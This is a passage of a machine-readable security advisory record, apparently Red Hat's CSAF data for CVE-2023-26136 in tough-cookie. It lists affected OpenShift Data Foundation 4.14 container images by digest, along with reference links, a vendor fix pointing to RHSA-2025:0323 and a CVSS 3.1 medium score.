"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-26136"
},
{
"category": "external",
"summary": "RHBZ#2219310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219310"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-26136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26136"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e",
"url": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/issues/282",
"url": "https://github.com/salesforce/tough-cookie/issues/282"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3",
"url": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3"
},
{
"category": "external",
"summary": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html",
"url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873",
"url": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873"
}
],
"release_date": "2023-07-01T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-01-15T01:19:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:0323"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
